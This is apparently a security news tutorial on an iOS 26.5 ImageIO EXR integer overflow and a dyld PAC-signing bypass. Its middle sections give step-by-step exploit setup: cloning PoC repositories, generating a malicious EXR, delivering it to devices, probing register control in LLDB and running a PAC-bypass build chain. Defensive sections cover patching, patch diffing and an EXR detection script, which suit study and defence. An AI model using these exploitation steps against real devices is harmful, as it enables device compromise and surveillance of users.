
Introduction:
In a recent disclosure, veteran iOS security researcher Alexandre Borges (@ale_sp_brazil) described a reproducible crash in ImageIO on iOS 26.5 with clear register control, a well-defined exploitation primitive, and a confirmed Proof-of-Concept (PoC). The researcher hints at a possible working exploit. The disclosure coincides with Apple's May 2026 security update, which patched multiple memory corruption vulnerabilities across iOS 26.5, iPadOS 26.5, macOS Tahoe 26.5, and other platforms. This article walks through the vulnerability class, the exploitation primitives it yields, and the steps a security researcher would take to understand, reproduce, and mitigate these iOS memory corruption flaws.
Learning Objectives:
- Understand the mechanics of integer overflow and heap buffer overflow vulnerabilities in iOS’s ImageIO framework (CVE-2026-28990)
- Learn to establish register control, read/write primitives, and develop reliable Proof-of-Concept exploits for iOS
- Learn the LLDB debugging workflow on iOS, patch diffing techniques, and how the dyld chained-fixup signing oracle is used to bypass PAC
1. Understanding the Vulnerability: Integer Overflow in EXR Image Processing
The core vulnerability resides in the `EXRReadPlugin::decodeBlockAppleEXR` function within Apple's ImageIO framework. Prior to iOS 26.5, the buffer size for a decoded block is derived from the product of the image's `width` and `height`, and that product is computed in 32-bit arithmetic without an overflow check. A specially crafted EXR image whose dimensions make the product wrap (65536 x 65536 is exactly 2^32, so it wraps to zero) causes the function to call `malloc_type_malloc` with a tiny size. The decoder then writes the full pixel payload into that undersized buffer, overflowing the heap, corrupting adjacent allocations, and producing a deterministic crash.
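As an added example (not code from the page, from the researcher's PoC, or from Apple's ImageIO), the following C program writes out the size-calculation pattern described above next to a hardened version, and models the allocate-then-fill step so the effect of the wrap can be measured. All names are illustrative: `vuln_block_size`, `safe_block_size`, `simulate_decode`, the 1-byte-per-pixel payload, the constructed 64-byte pixel buffer and the 256 MiB allocation cap are assumptions, and the real `EXRReadPlugin::decodeBlockAppleEXR` code is not reproduced. `__builtin_mul_overflow` is a GCC/Clang builtin.

```c
/* Added example: 32-bit width*height wrap versus a checked size computation.
 * Names, the payload size and the allocation cap are illustrative assumptions. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative sanity cap on a single decoded block (assumption, not Apple's value). */
#define MAX_BLOCK_BYTES (256u * 1024u * 1024u)

/* Vulnerable pattern: the product is computed in 32 bits. 65536 * 65536 == 2^32 wraps
 * to 0, and 65536 * 65537 wraps to 65536, so the allocation is far smaller than the
 * pixel data the decoder is about to write. */
uint32_t vuln_block_size(uint32_t width, uint32_t height, uint32_t bytes_per_pixel)
{
    return width * height * bytes_per_pixel;
}

/* Hardened pattern: widen to size_t, check every multiplication for overflow, and
 * refuse absurd sizes instead of wrapping. Returns false when the size is unusable. */
bool safe_block_size(uint32_t width, uint32_t height, uint32_t bytes_per_pixel,
                     size_t *out)
{
    size_t pixels, total;
    if (width == 0 || height == 0 || bytes_per_pixel == 0)
        return false;
    if (__builtin_mul_overflow((size_t)width, (size_t)height, &pixels))
        return false;
    if (__builtin_mul_overflow(pixels, (size_t)bytes_per_pixel, &total))
        return false;
    if (total > MAX_BLOCK_BYTES)
        return false;
    *out = total;
    return true;
}

/* Models the decoder's allocate-then-fill step. Returns -1 when the hardened check
 * rejects the dimensions before malloc, otherwise the number of bytes the pixel copy
 * would have written past the allocation (0 means it fits). The copy is clamped here
 * so this harness never writes out of bounds; the real bug does not clamp. */
long simulate_decode(uint32_t width, uint32_t height, uint32_t bpp,
                     const uint8_t *pixel_data, size_t pixel_len, bool hardened)
{
    size_t alloc;
    if (hardened) {
        if (!safe_block_size(width, height, bpp, &alloc))
            return -1;
    } else {
        alloc = vuln_block_size(width, height, bpp);
    }
    uint8_t *buf = malloc(alloc ? alloc : 1);
    if (!buf)
        return -1;
    size_t excess = pixel_len > alloc ? pixel_len - alloc : 0;
    memcpy(buf, pixel_data, pixel_len - excess); /* bounded here; unbounded in the bug */
    free(buf);
    return (long)excess;
}

/* Convenience wrapper: decode a constructed 64-byte payload of 'A' bytes with the given
 * header dimensions, vulnerable or hardened. */
long demo_decode(uint32_t width, uint32_t height, bool hardened)
{
    uint8_t pixels[64]; /* constructed stand-in for the scanline payload */
    memset(pixels, 'A', sizeof pixels);
    return simulate_decode(width, height, 1, pixels, sizeof pixels, hardened);
}

int main(void)
{
    size_t ok = 0;
    printf("vuln 65536x65536x1 -> size %u\n", vuln_block_size(65536, 65536, 1));
    printf("vuln 65536x65537x1 -> size %u\n", vuln_block_size(65536, 65537, 1));
    printf("safe 65536x65536x1 -> %s\n",
           safe_block_size(65536, 65536, 1, &ok) ? "accepted" : "rejected");
    printf("vuln decode 65536x65536: %ld bytes past allocation\n",
           demo_decode(65536, 65536, false));
    printf("safe decode 65536x65536: %ld (rejected before malloc)\n",
           demo_decode(65536, 65536, true));
    printf("vuln decode 8x8: %ld bytes past allocation\n", demo_decode(8, 8, false));
    return 0;
}
```

The wrapped size alone is not the overflow; the overflow is the gap between the wrapped allocation and the payload the decoder writes, which is why `simulate_decode` reports excess bytes rather than the size. The hardened version both checks the multiplication and caps the result, so a 4 GiB request from a 65536 x 65536 header is rejected even on a 64-bit `size_t` where the product itself does not overflow.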
Technical Deep Dive:
The crash manifests as a guard exception (EXC_GUARD, a guard violation rather than a plain EXC_BAD_ACCESS) with register corruption, as observed in the following LLDB stop:

```
* thread #5, queue = 'com.apple.root.user-interactive-qos', stop reason = EXC_GUARD
    frame #0: 0x00000001855ba8c8 libdispatch.dylib`_dispatch_root_queue_drain + 176
->  0x1855ba8c8 <+176>: ldr    x8, [x0, #0x10]!
```

The faulting instruction loads through `x0` (with writeback), so the value in `x0` at the stop is where the heap corruption first becomes visible: libdispatch is walking a queue structure that the overflow has overwritten.
Step-by-Step Exploitation Setup (Linux/macOS Environment):
1. Obtain the PoC. Clone the public repository containing the EXR ImageIO overflow PoC:

```bash
git clone https://github.com/Padawan986/Overflow-Bug.git
cd Overflow-Bug
```

2. Generate the payload. The repository includes Python and Objective-C components for crafting malicious EXR files. 65536 x 65536 is the smallest square image whose pixel count is a multiple of 2^32, so the 32-bit product wraps to exactly zero:

```bash
python3 generate_exr_poc.py --width 65536 --height 65536 --output payload.exr
```

3. Deploy to a test device running a vulnerable build (iOS < 26.5). Note that `ideviceinstaller -i` installs `.ipa` packages and cannot transfer a loose image file. Copy `payload.exr` to the device another way (AirDrop, or serve the directory with `python3 -m http.server` and open the URL) and trigger decoding by viewing it in Safari or any image-rendering application.

4. Capture crash logs. On the device, go to Settings > Privacy & Security > Analytics & Improvements > Analytics Data to retrieve the crash report (an `.ips` file). Alternatively, watch the live log with `idevicesyslog`; `-E` is required so that `|` is treated as alternation:

```bash
idevicesyslog | grep -iE "EXC_GUARD|ImageIO"
```
2. Establishing Exploit Primitives: Register Control and Memory Corruption
According to Apple's Security Research documentation, successful exploitation typically requires three fundamental levels of control: register control, read/write primitives, and control over program flow. In this vulnerability, the heap overflow lets an attacker partially or fully control register values, as demonstrated by the crash log showing controlled values in registers such as `x0` and `x8`.
Analyzing Register Control with LLDB:
A text crash report (`.ips` or `.crash`) is not a symbol file, so `target modules add --symfile` cannot load it. To inspect live register state you need a process stopped under the debugger (or a core file). Attach LLDB before the image is rendered, let the process crash, then read the registers and the faulting instruction:

```
(lldb) process attach --name <target process>
(lldb) continue
(lldb) thread backtrace
(lldb) register read --all
(lldb) disassemble --pc
```

If only the `.ips` report is available, its `threadState` section records the same register values at the moment of the crash; compare them against the byte patterns in the payload to see which registers the overflow reaches.
Towards a Read/Write Primitive:
Controlling a register at the crash site is not yet a read/write primitive. That comes from corrupting an object whose fields the program later dereferences; once an attacker can read and write chosen addresses, ROP or JOP (or a PAC-aware equivalent on arm64e) turns that into control of program flow. The LLDB script below does not build a primitive by itself. It lets you overwrite a register from the debugger at any stop, which is how you test what happens downstream when a given register holds an attacker pattern (for instance, which instruction faults and with what address), and so map a crash to the level of control it actually offers:

```python
# register_control.py: LLDB Python command that overwrites a register at a stop.
# Save under this exact file name (the module name is used in __lldb_init_module), then:
#   (lldb) command script import /path/to/register_control.py
#   (lldb) set_reg x0 0x4141414141414141
import lldb

def set_register_value(debugger, command, result, internal_dict):
    """Usage: set_reg <register> <value>  (value is parsed by LLDB, hex accepted)"""
    args = command.split()
    if len(args) != 2:
        result.SetError("usage: set_reg <register> <value>")
        return
    reg_name, value = args
    frame = debugger.GetSelectedTarget().GetProcess().GetSelectedThread().GetSelectedFrame()
    if not frame.IsValid():
        result.SetError("no selected frame; is the process stopped?")
        return
    reg = frame.FindRegister(reg_name)
    if not reg.IsValid():
        result.SetError("unknown register: %s" % reg_name)
        return
    # SBValue takes the new value as a string; a Python int is not accepted directly.
    if not reg.SetValueFromCString(value):
        result.SetError("failed to set %s" % reg_name)
        return
    result.PutCString("[+] %s overwritten with %s" % (reg_name, value))

def __lldb_init_module(debugger, internal_dict):
    debugger.HandleCommand(
        'command script add -f register_control.set_register_value set_reg')
```
3. PAC Bypass and Advanced Exploitation: The dyld Signing Oracle
Modern iOS devices (arm64e) implement Pointer Authentication Codes (PAC) to mitigate ROP and JOP attacks: code and data pointers carry a cryptographic signature in their unused high bits, and forging one requires the per-process keys. However, recent research (CVE-2026-20700) demonstrates that the dynamic linker (dyld) itself can be weaponized as a PAC signing oracle. dyld legitimately signs pointers while applying chained fixups, since each authenticated fixup in `LC_DYLD_CHAINED_FIXUPS` records the target together with the key and discriminator to sign it with. By crafting a malicious Mach-O binary whose fixup table points at attacker-controlled slots, an attacker can direct dyld to produce PAC-valid pointers of the attacker's choosing without ever holding the keys.
Step-by-Step PAC Bypass with dyld Oracle:
1. Clone the CVE-2026-20700 Repository:

```bash
git clone https://github.com/R3n3r0/CVE-2026-20700.git
cd CVE-2026-20700
```

2. Build the Exploit Pipeline:

```bash
# Full build with 99k symbols
make
# Fast iteration build
make SYMBOLS=10000
```

3. Generate the Malformed Dylib:

```bash
# Generate the hand-crafted Mach-O dylib
python3 generators/gen_malformed_dylib.py
```

4. Trigger PAC-Signed Pointer Injection:
The exploit forces dyld to write a PAC-valid pointer into a `dispatch_source_t` timer handler, which is then called naturally through the event loop:

```bash
# Run the chain_close preset to execute the dispatch event loop
make chain_close
```

5. Verify the Exploit:

```bash
# Parse the LC_DYLD_CHAINED_FIXUPS header
make inspect
# Scan for writable pointer sections
make scan
```
Windows/Linux Alternative for Analysis:
For researchers on non-macOS platforms, the `ipsw` tool (blacktop/ipsw, written in Go) downloads firmware and parses Mach-O binaries and the dyld shared cache. It is not a Python package, so `pip3 install ipsw` does not install it; use a release binary from the project's GitHub releases page or Homebrew:

```bash
# Install (Homebrew shown; prebuilt binaries exist for Linux and Windows)
brew install blacktop/tap/ipsw
# Download the iOS 26.5 IPSW for iPhone14,3 and extract the dyld shared cache
ipsw download ipsw --device iPhone14,3 --version 26.5
ipsw extract --dyld ./iPhone14,3_26.5.ipsw
# Inspect the cache and pull ImageIO out of it for disassembly or diffing
ipsw dyld info ./dyld_shared_cache_arm64e
ipsw dyld extract ./dyld_shared_cache_arm64e ImageIO
```

ImageIO does not ship as a standalone file on iOS; it lives inside the dyld shared cache, which is why the extraction step is needed before any per-binary tooling can be used.
4. Patch Diffing: Identifying the Fix in iOS 26.5
Apple addressed these vulnerabilities with improved bounds checking, input validation, and memory handling across multiple components. Security researchers can perform patch diffing to understand the exact changes:
Using `radare2` for Binary Diffing:
`r2 -c "diff a b"` is not a radare2 command; binary diffing is done with the companion tool `radiff2`. Extract `ImageIO` from the iOS 26.4.2 and 26.5 dyld shared caches (for example with `ipsw dyld extract`), diff the two binaries at function level, then graph-diff `EXRReadPlugin::decodeBlockAppleEXR` once you have its address in each build. For an integer-overflow fix, expect a new comparison and conditional branch ahead of the call to `malloc_type_malloc`:

```bash
# Analyze both binaries (-A) and compare functions (-C)
radiff2 -AC ./iOS_26.4.2/ImageIO ./iOS_26.5/ImageIO
# Graph diff of a single function, given its offset in each binary
radiff2 -g <addr_old>,<addr_new> ./iOS_26.4.2/ImageIO ./iOS_26.5/ImageIO
```
Key Patched Components in iOS 26.5:

| Component | Vulnerability | CVE-ID | Patch Description |
|---|---|---|---|
| Accelerate | Out-of-bounds read | CVE-2026-28991 | Improved bounds checking |
| APFS | Buffer overflow | CVE-2026-28959 | Improved bounds checking |
| App Intents | Sandbox escape | CVE-2026-28995 | Improved restrictions |
| AppleJPEG | Memory corruption | CVE-2026-1837 | Improved input validation |
| ImageIO | Integer overflow | CVE-2026-28990 | Improved bounds checking |
5. Mitigation Strategies and Defensive Measures
For security teams and iOS administrators, the following mitigation strategies are critical:
- Immediate Patching: Apply iOS 26.5, iPadOS 26.5, macOS Tahoe 26.5, and the associated updates. Apple released them on May 11, 2026.
- Restrict Media Processing: Until patches are deployed, advise users not to open media files (especially EXR and JPEG images and media containers) from untrusted sources.
- Implement File Type Validation: Where mail and web gateways inspect attachments, block or quarantine EXR files by content, matching the magic bytes `76 2f 31 01` rather than the extension. ImageIO selects its decoder from the file contents, so a renamed `.exr` is still parsed as EXR.
- Enable Exploit Protection: On macOS, keep System Integrity Protection enabled and leave Gatekeeper enforcing notarization (both are on by default). On iOS, enable Lockdown Mode for high-risk users; it restricts the attachment types and web content that reach the image decoders.
- Monitor for Indicators of Compromise (IoCs):
  - Unexpected app crashes, especially in image-rendering applications
  - Crash logs showing `EXC_GUARD` or `EXC_BAD_ACCESS` with controlled register values
  - Unusual network traffic from media-processing daemons
Linux/Windows Detection Script:
The script parses the EXR header properly instead of reading two integers at a fixed offset, and flags any 32-bit wrap of the pixel count rather than only the wrap to exactly zero, since any wrap yields an undersized allocation:

```python
# Scan files for EXR headers whose width*height overflows 32 bits. After the 4-byte
# magic and 4-byte version field an EXR header is a list of attributes
# (name\0 type\0 int32 size, value) ending with an empty name; the dimensions are the
# "dataWindow" attribute (box2i: int32 xMin, yMin, xMax, yMax), not two uint32s at offset 8.
import struct
import sys

EXR_MAGIC = b'\x76\x2f\x31\x01'

def read_cstring(f):
    out = bytearray()
    while (c := f.read(1)) not in (b'', b'\x00'):
        out += c
    return bytes(out) if c else None  # None on EOF

def exr_dimensions(f):
    if f.read(4) != EXR_MAGIC:
        return None
    f.read(4)  # version/flags
    while name := read_cstring(f):  # empty name ends the header
        typ, raw = read_cstring(f), f.read(4)
        if typ is None or len(raw) < 4:
            return None
        value = f.read(max(struct.unpack('<i', raw)[0], 0))
        if name == b'dataWindow' and typ == b'box2i' and len(value) == 16:
            xmin, ymin, xmax, ymax = struct.unpack('<iiii', value)
            return xmax - xmin + 1, ymax - ymin + 1
    return None

def check_exr_overflow(filepath):
    # Flag any 32-bit wrap of the product, not only the wrap to exactly zero.
    with open(filepath, 'rb') as f:
        dims = exr_dimensions(f)
    if not dims:
        return False
    width, height = dims
    if width > 0 and height > 0 and width * height > 0xFFFFFFFF:
        print(f"[!] Potential malicious EXR: {filepath} (width={width}, height={height}, "
              f"32-bit product={(width * height) & 0xFFFFFFFF})")
        return True
    return False

if __name__ == "__main__":
    for arg in sys.argv[1:]:
        check_exr_overflow(arg)
```
6. iOS Debugging and Exploit Development Workflow
For researchers building on these primitives, the following workflow is recommended. ImageIO decoding runs in user space, so the crash itself is debugged by attaching to the process that renders the image; the kernelcache step at the end is for separate kernel-side analysis.
Setting Up a Debugging Environment (Corellium or Physical Device):
1. Enable Developer Mode on iOS:
Settings > Privacy & Security > Developer Mode > Enable
2. Attach LLDB to a Running Process. `<device-ip>` and `<pid>` are placeholders; a `debugserver` listening on port 1234 on the device (jailbroken device or Corellium VM) is assumed:

```bash
# Find the PID of the process that is decoding the image
idevicesyslog | grep "ImageIO"
# Attach from the host
lldb
(lldb) platform select remote-ios
(lldb) process connect connect://<device-ip>:1234
(lldb) process attach --pid <pid>
```

3. Set a Breakpoint on the Decoder. Breakpoint commands written in Python are added with `-s python`, and the multi-line prompt is closed with `DONE`:

```
(lldb) breakpoint set --name EXRReadPlugin::decodeBlockAppleEXR
(lldb) breakpoint command add -s python 1
Enter your Python command(s). Type 'DONE' to end.
    print("Breakpoint hit at EXR decode")
    DONE
(lldb) continue
```

4. Inspect the Kernelcache with ipsw. `ipsw kernel dump` is not an `ipsw` subcommand; decompress the kernelcache if needed and list its kexts instead:

```bash
ipsw kernel dec ./kernelcache.release.iPhone14,3
ipsw kernel kexts ./kernelcache.release.iPhone14,3
```
What Undercode Say:
- Key Takeaway 1: The iOS 26.5 EXR ImageIO integer overflow (CVE-2026-28990) provides a reliable heap overflow with deterministic register control, making it a prime candidate for full exploit chain development.
- Key Takeaway 2: The combination of memory corruption primitives with PAC bypass techniques (CVE-2026-20700) demonstrates that even modern hardware defenses can be subverted through creative exploitation of trusted system components like dyld.
Analysis:
The disclosure by Alexandre Borges highlights a critical trend in iOS security research: the convergence of traditional memory corruption vulnerabilities with sophisticated bypass techniques for modern mitigations. While Apple’s rapid patching of iOS 26.5 addresses the immediate threat, the existence of public PoCs and the demonstrated register control primitive significantly lowers the barrier for attackers to develop reliable exploits. The EXR overflow is particularly concerning because it can be triggered remotely via Safari or iMessage, requiring only a malicious image file. Organizations must prioritize patching and implement strict media file controls. Furthermore, the dyld PAC oracle technique reveals that pointer authentication, while effective against naive ROP, is not a silver bullet—system components with elevated privileges remain attractive targets. Security researchers should focus on understanding these primitive-building techniques to develop more robust mitigations and detection mechanisms.
Prediction:
- +1 The public disclosure of these vulnerabilities will accelerate iOS security research, leading to improved fuzzing frameworks and automated exploit generation tools for the ImageIO attack surface.
- -1 Nation-state actors and commercial spyware vendors will rapidly weaponize the EXR overflow PoC, integrating it into zero-click exploit chains targeting journalists, activists, and political figures, similar to previous Operation Triangulation campaigns.
- +1 Apple's security team will respond with enhanced input validation and memory safety measures in iOS 27, potentially adopting more aggressive sandboxing for image-processing daemons.
- -1 The dyld PAC oracle technique will inspire a new wave of research into trusted system component abuse, potentially leading to a class of "trusted oracle" vulnerabilities that bypass hardware-based security controls.
- +1 The security community will develop open-source detection tools and YARA rules to identify malicious EXR files, improving defensive capabilities for enterprise iOS deployments.
- -1 Users on older iOS versions (prior to 26.5) remain vulnerable and face increased risk of targeted attacks, as patch adoption rates for iOS updates typically lag behind release dates.
Reported By: Aleborges Ios – Hackers Feeds